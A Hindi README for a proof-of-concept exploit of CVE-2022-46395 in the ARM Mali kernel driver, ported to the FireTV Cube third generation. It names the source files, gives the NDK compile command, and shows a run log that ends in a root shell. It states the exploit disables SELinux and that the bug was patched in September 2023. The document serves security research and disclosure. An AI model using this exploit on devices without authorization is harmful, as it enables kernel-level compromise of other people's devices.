
CVE-2022-46395 FireTV तीसरी पीढ़ी क्यूब (gazelle) के लिए POC
यह सुरक्षा शोधकर्ता Man Yue Mo के Pixel 6 POC का एक फोर्क है CVE-2022-46395 के लिए। भेद्यता के बारे में उनका विस्तृत लेख यहाँ पढ़ें। FireOS के 32-बिट उपयोगकर्ता स्थान को ध्यान में रखते हुए परिवर्तन किए गए हैं। POC ARM Mali कर्नेल ड्राइवर में एक बग का शोषण करता है ताकि मनमाना कर्नेल कोड निष्पादन प्राप्त किया जा सके, जिसका उपयोग SELinux को अक्षम करने और रूट प्राप्त करने के लिए किया जाता है।
इस शोषण को PS7664/3772 (सितंबर 2023) में पैच किया गया था। संदर्भ के लिए, ndk-21 में clang के साथ संकलन करने के लिए निम्नलिखित कमांड का उपयोग किया गया था:
android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/armv7a-linux-androideabi28-clang -DSHELL mali_user_buf.c mempool_utils.c mem_write.c -o gazelle_buf
सबसे तेज़ परिणामों के लिए, एक ताज़ा रीबूट के बाद चलाएँ। औसतन POC को रूट प्राप्त करने में 20-60 सेकंड लगते हैं।
gazelle:/ $ /data/local/tmp/gazelle_buf
fingerprint: Amazon/gazelle/gazelle:9/PS7652.3564N/0028488625152:user/amz-p,release-keys
benchmark_time 102
failed after 100
finished reset: 919423975 fault: 918468559 3795 err 0 read 3
found pgd at page 8
overwrite addr : 104100558 558
overwrite addr : 104300558 558
overwrite addr : 10410082c 82c
overwrite addr : 10430082c 82c
result 50
success after 128
gazelle:/ #